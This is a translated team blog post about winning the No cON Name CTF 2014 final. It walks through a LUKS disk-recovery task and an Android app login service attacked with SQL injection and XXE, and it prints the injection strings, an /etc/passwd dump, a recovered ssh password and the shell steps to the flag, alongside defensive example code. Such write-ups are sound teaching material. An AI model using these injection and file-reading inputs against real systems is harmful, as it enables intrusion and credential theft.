No cON Name CTF 2014 Final

    From October 30 to November 1, Barcelona hosted the international information security conference No cON Name 2014, during which the final of its Capture The Flag competition was held for the second time. The Innopolis University team BalalaikaCr3w took part in this competition and won first place. Below is our story of how it went, a few examples of the tasks, and thanks to those who helped us.


    CTF zone during the final

    What is CTF?


    For those who don't know what a Capture The Flag competition is: it is something like a programming contest, but most of the time you do not write your own code; you exploit mistakes in someone else's. Tasks imitate vulnerabilities found in real programs, for example buffer overflows, "home-made" cryptography, or unescaped text inserted into SQL queries, or require actions similar to those used when investigating computer incidents: analysing logs, searching for deleted files and hidden data. The result of a correctly solved task is a text string, the flag. The flags found are handed over to the competition organizers, who award points to the team.

    Most of these competitions are held online with free registration. The largest also have a final round, where several teams (about 10) that took the top places in the online round gather at the organizers' venue to compete for first place under equal conditions (regardless of time zone).

    A bit of history: "No cON Name CTF 2013"


    Last year, No cON Name CTF was co-organized with Facebook. Despite the rather strange qualifying round, which consisted of only three tasks, the final turned out to be interesting and worth attention. The format of last year's final was somewhat atypical for hacker CTF competitions: there were tasks for which a fixed number of points was awarded once, and there were also neutral services hosted on the organizers' servers. After exploiting a vulnerability in one of the services, the team had to write its name into a specific file on the server. At fixed intervals, the organizers' checker took the team name from that file and awarded that team a certain number of points.


    The BalalaikaCr3w team took 3rd place last year

    Qualifying Tour “No cON Name 2014”


    This year the qualifying stage lasted 24 hours and consisted of 10 tasks, 9 of which we solved in the first hours of the game. We managed to solve the last task, called Explicit, only 5-6 hours before the end of the CTF. Write-ups of some qualifying tasks can be found on our blog.

    Final “No cON Name 2014”


    The final, as you already understood, was held in Barcelona, on the premises of Ramón Llull University. Conditions: 8 hours, 16 tasks. Tasks were worth from 150 to 400 points. One of the tasks was a shared interactive service, the "capture" of which brought the team 50 points every 10 minutes.

    Below we describe a couple of tasks and our approach to solving them. This text was written not so much for information security enthusiasts as for people curious about what goes on at such competitions, so we simplified some points at the expense of detail. For detailed analysis there are write-ups in team blogs.

    HIDDENtation Quest (300 points)


    Task: "Dig deep into the file and find the flag", given a file of about 95 MB.

    One of the most enjoyable moments of any CTF is learning something new. This time we needed to understand the LUKS disk encryption format. Using a hex editor and an Internet search for the string "LUKs" (4C 55 4B 73), we quickly found out that the attached file is exactly such a virtual encrypted disk.



    The standard cryptsetup utility for this disk format refused to work with the file from the task, printing "Device hiddentation is not a valid LUKS device". From the format description we learn that the correct signature at the start of the file should be "LUKS" (4C 55 4B 53). We fix it; now the file opens, but we do not have the key to the encrypted disk.

    After reading the documentation, we find out that the disk is encrypted with a master key, but this key itself is not given to the user; instead it is stored, in several encrypted copies, in the disk header. Each copy of the master key is decrypted with its own user key. There can be up to eight such user keys, matching the number of key slots reserved for them in the disk header.

    In our case, cryptsetup insisted that all eight key slots were empty. But looking carefully at where the slots are located in the hex editor, you can see that one of them contains some data:



    The first four bytes of a slot record, with the value 0x0000DEAD, indicate that it is inactive. Replacing them with 0x00AC71F3 activates this slot. Now we need to find the user key for it.

    Immediately after the header, where zero bytes are usually added for alignment, there is text with some special characters:



    "Try \x19 most common passwd in \x07\xDD", which can be interpreted as "Try the 25 most popular passwords of 2013". However, none of the 25 most popular passwords opened the container.

    The next step, unfortunately, turned out to be a "guessing game" (the category of task most hated by all CTF teams). We were lucky that cryptsetup creates containers identical to the one in the task. Having created a container ourselves, we noticed that the record for the last key slot contains the value 0x0708 in the "key material offset" field, whereas in the file from the task it is 0x0608:



    Replacing it with the correct value allows the container to be opened with the password "shadow".
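    As an added example (not from the writeup), here is a small Python check of a LUKS1 header that flags the three things fixed by hand above: a wrong magic, a key slot marked 0x0000DEAD that still holds salt/iteration data, and a key-material offset that disagrees with cryptsetup's aligned layout (assumed: 32-byte keys, 4000 stripes, slot 0 at sector 8, 4096-byte slot alignment). The sample header is constructed and the helper names are ours.

```python
import struct

# Constants from the LUKS1 on-disk format (not from the writeup).
LUKS1_MAGIC = b"LUKS\xba\xbe"
SLOT_ACTIVE, SLOT_DISABLED = 0x00AC71F3, 0x0000DEAD
PHDR_FMT = ">6sH32s32s32sII20s32sI40s"  # fixed header part, 208 bytes
SLOT_FMT = ">II32sII"                    # active, iterations, salt, key-material offset, stripes
SECTOR, SLOT_ALIGN = 512, 8              # key material is aligned to 8 sectors (4096 bytes)

def expected_slot_offsets(key_bytes, stripes_per_slot):
    """Sector offset of each slot's key material as cryptsetup lays it out (slot 0 at sector 8)."""
    offsets, off = [], SLOT_ALIGN
    for stripes in stripes_per_slot:
        offsets.append(off)
        sectors = -(-key_bytes * stripes // SECTOR)       # ceil(bytes / sector)
        off += -(-sectors // SLOT_ALIGN) * SLOT_ALIGN      # round up to the alignment
    return offsets

def check_luks1_header(hdr):
    """Parse a LUKS1 header and report the three kinds of tampering seen in the task."""
    magic, version, cipher, mode, _hash, _payload, key_bytes, _dg, _ds, _di, _uuid = \
        struct.unpack_from(PHDR_FMT, hdr, 0)
    issues = [] if magic == LUKS1_MAGIC else ["bad magic %s" % magic.hex()]
    slots = [struct.unpack_from(SLOT_FMT, hdr, 208 + 48 * i) for i in range(8)]
    expected = expected_slot_offsets(key_bytes, [s[4] for s in slots])
    for i, (active, iters, salt, km_off, _stripes) in enumerate(slots):
        if active not in (SLOT_ACTIVE, SLOT_DISABLED):
            issues.append("slot %d: unknown active flag 0x%08X" % (i, active))
        elif active == SLOT_DISABLED and (iters or salt.strip(b"\0")):
            issues.append("slot %d: marked disabled but holds salt/iterations" % i)
        if km_off != expected[i]:
            issues.append("slot %d: key-material offset 0x%X, expected 0x%X" % (i, km_off, expected[i]))
    return {"version": version, "cipher": cipher.rstrip(b"\0").decode(),
            "mode": mode.rstrip(b"\0").decode(), "key_bytes": key_bytes,
            "active_slots": [i for i, s in enumerate(slots) if s[0] == SLOT_ACTIVE],
            "issues": issues}

def build_sample_header(tampered=True):
    """Constructed header: tampered=True mimics the task (magic 'LUKs', slot 7 hidden, offset 0x608)."""
    magic = b"LUKs\xba\xbe" if tampered else LUKS1_MAGIC
    hdr = struct.pack(PHDR_FMT, magic, 1, b"aes", b"cbc-essiv:sha256", b"sha1",
                      2056, 32, b"\0" * 20, b"\0" * 32, 1000, b"\0" * 40)
    for i in range(8):
        last = (i == 7)
        flag = SLOT_DISABLED if (tampered or not last) else SLOT_ACTIVE
        salt = bytes([0x11] * 32) if last else b"\0" * 32       # slot 7 carries real-looking data
        km_off = 0x608 if (tampered and last) else 8 + 256 * i  # 0x708 is the correct value for slot 7
        hdr += struct.pack(SLOT_FMT, flag, 50000 if last else 0, salt, km_off, 4000)
    return hdr
```

    check_luks1_header(build_sample_header())["issues"] lists the three findings; with tampered=False the repaired header reports none and slot 7 shows as active.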

    But this is not the whole solution. The decrypted container held a disk image with three partitions. The help files on the first two partitions said what to look for on the third. The third partition contained no files at all. As the organizers later explained to us, there was an NTFS partition at some offset on which the file was located. We, however, applied the first rule of CTF: "strings everywhere". Among the heap of strings from the file we found one very interesting:

    rot13:APAq986942o809qnn32n6987n7422771n53s59r5n1s02rq700ppr43p5196non749r

    Applying rot13 gives the flag:
    NCNd986942b809daa32a6987a7422771a53f59e5a1f02ed700cce43c5196aba749e .

    Quest demDROID (400 points)


    Task: an Android application is given as an .apk file.

    There are plenty of articles on Habr about how to decompile such files, so we will not dwell on it. After decompiling, we find out that the application connects to server 10.210.6.1 on the game subnet and sends the following HTTP request:

    POST / HTTP/1.0
    Content-Type: text/xml
    User-Agent: denDROID 1.0
    Host: 10.210.6.1
    {$username}{$password}

    At this point we had two options for exploitation:

    1. SQL injection. Compare two requests (without headers):

    Normal request:
    balalaikaasd

    Response:
    User balalaika is not found!


    Injection in the login field:
    q' OR 'x'='xasd

    Response:
    Invalid password for user q' OR 'x'='x!


    2. XXE (XML eXternal Entity) attack

    Request:
    ]>q' OR 1=1 /*&xxe;&xxe;

    Response:
    Invalid password for user q' OR 1=1 /*root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    # sync:x:4:65534:sync:/bin:/bin/sync
    # games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    # lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    # mail:x:8:8:mail:/var/mail:/bin/sh
    # news:x:9:9:news:/var/spool/news:/bin/sh
    # uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
    messagebus:x:102:103::/var/run/dbus:/bin/false
    ch6:x:1000:1000::/home/ch6:/bin/sh
    !


    Using the XXE, we try various candidate names for the file with the flag (flag, flag.txt, /flag, /flag.txt, etc.), as well as various configuration files (for example /etc/nginx/nginx.conf), but find nothing interesting.

    We return to exploiting the SQL injection. Using the SUBSTR() function, we extract, character by character, the username and password of what turned out to be the only user in the database. We try to log in with it:

    l3wlzHunt3rmw4h4h4

    Server response:

    Welcome, l3wlzHunt3r!
    Good job! But your flag is in another castle!



    Oh, these trolls.

    Alas, this is not the answer. Sometimes CTF tasks are arranged so that a seemingly correct solution path leads to a false result. A honeypot, so to speak.

    There was nothing else in the database, so we had to return to the XXE. Looking at the .bash_history of user ch6, we saw some suspicious lines:

    ...
    tjG86fKwJ2yZ
    ...
    sudo vim /etc/hosts
    ping Wopr
    sudo vim /etc/hosts
    ping Osiris
    nc Osiris 1135
    nc Osiris 11235
    curl Osiris 11235
    curl Osiris:11235
    ...
    

    It turned out that tjG86fKwJ2yZ is the password of user ch6. The rest was trivial:

    ssh ch6@10.210.6.1
    tjG86fKwJ2yZ
    $ curl Osiris:11235
    NcN_f86c108687fd25eea4f8ba10dd4c9bad8fa70a9f74179caf617364965cb8cb4f
    

    Flag: NcN_f86c108687fd25eea4f8ba10dd4c9bad8fa70a9f74179caf617364965cb8cb4f

    It should be noted that this was not a very well-thought-out move by the organizers, because permissions were set up such that ssh access allowed one to clear .bash_history, add one's own public keys to authorized_keys, and completely block access for the other teams.

    It is also worth noting that the host Osiris (whose address could be learned via the XXE from /etc/hosts) was not directly reachable from the teams' computers. It could only be reached from the 10.210.6.1 server.

    Nevertheless, the task turned out to be difficult and, on the whole, interesting, because it required skills in two categories at once (reverse + web).
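    As an added example, not code from the task service or from the writeup, the following Python models the demDROID login endpoint twice: a string-built query that reproduces the responses shown above, and a hardened handler with a parameterised query, a single failure message, and rejection of any DTD before the XML is parsed. The tag names <username>/<password>, the table layout and the placeholder password are assumptions; the user table and request body are constructed.

```python
import hashlib
import hmac
import sqlite3
import xml.etree.ElementTree as ET

XXE_BODY = ('<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///placeholder/path">]>'
            '<username>&xxe;</username><password>&xxe;</password>')  # constructed; placeholder path

def make_db():
    """Constructed in-memory user table; the name is from the writeup, the password is a placeholder."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users(username TEXT, pw_hash TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("l3wlzHunt3r", hashlib.sha256(b"placeholder-password").hexdigest()))
    return db

def parse_login_xml(body):
    """Hardened parse: refuse any DTD (where external entities are declared), then read the fields.
    Tag names <username>/<password> are assumed; the writeup lost them in extraction."""
    if "<!DOCTYPE" in body or "<!ENTITY" in body:
        raise ValueError("DTD/entity declarations are not accepted")
    root = ET.fromstring("<login>" + body + "</login>")
    return root.findtext("username", ""), root.findtext("password", "")

def _pw_ok(row, password):
    return hmac.compare_digest(row[1], hashlib.sha256(password.encode()).hexdigest())

def login_vulnerable(db, username, password):
    """String-built query, as the task's service behaved: q' OR 'x'='x escapes the literal and matches every row."""
    row = db.execute("SELECT username, pw_hash FROM users WHERE username = '%s'" % username).fetchone()
    if row is None:
        return "User %s is not found!" % username
    if not _pw_ok(row, password):
        return "Invalid password for user %s!" % username
    return "Welcome, %s!" % row[0]

def login_hardened(db, username, password):
    """Parameterised query plus a single failure message, so usernames can no longer be enumerated."""
    row = db.execute("SELECT username, pw_hash FROM users WHERE username = ?", (username,)).fetchone()
    if row is None or not _pw_ok(row, password):
        return "Login failed"
    return "Welcome, %s!" % row[0]

def handle_login(db, body):
    """Hardened request path: any DTD or malformed XML is rejected before the database is touched."""
    try:
        user, pw = parse_login_xml(body)
    except (ValueError, ET.ParseError):
        return "Bad request"
    return login_hardened(db, user, pw)
```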

    Timeline


    From the very first minutes we took the initiative into our own hands, taking first blood:

    The first task we solved was a fairly simple steganography task called WireTap.

    By midday the tournament hosts, the most experienced Spanish team int3pids, opened their score by capturing the neutral dragons service. The intrigue grew, because for the captured service int3pids received 50 points every 10 minutes while simultaneously solving other tasks and getting points for them. A couple of hours later the Ukrainian team dcua entered the fray by solving a task called vodka, but it was already hard for them to claim victory: our BalalaikaCr3w team and the home team int3pids were too far ahead.

    As a result, we managed to stay at the top of the scoreboard until the very end of the competition:

    Teams with zero points did not appear on the scoreboard

    It should be noted that the NcN CTF in Barcelona is only in its second year and is not as popular and well-known as some other CTF competitions. However, the quality of the event is growing. I would like to wish the No cON Name association not to rest on its laurels but to keep moving forward, prepare even more interesting tasks, attract more sponsors, and raise the level and prestige of their conference and CTF.

    Acknowledgments


    The BalalaikaCr3w team thanks Innopolis University for supporting and organizing our trip to the finals. Innopolis is a new university focused on IT and robotics. Starting next year, a Cyber Security Master's programme is planned to open, and they are actively attracting young professionals in the field of information security.

    Our team is also grateful to the companies Active and ABBYY Language Services for supporting their employees' participation in this event.

    References


    For write-ups of tasks from the No cON Name CTF 2014 finals and other competitions, see our blog: ctfcrew.org
    Information about upcoming CTFs and everything happening in the CTF world is on the main resource for all teams: ctftime.org.
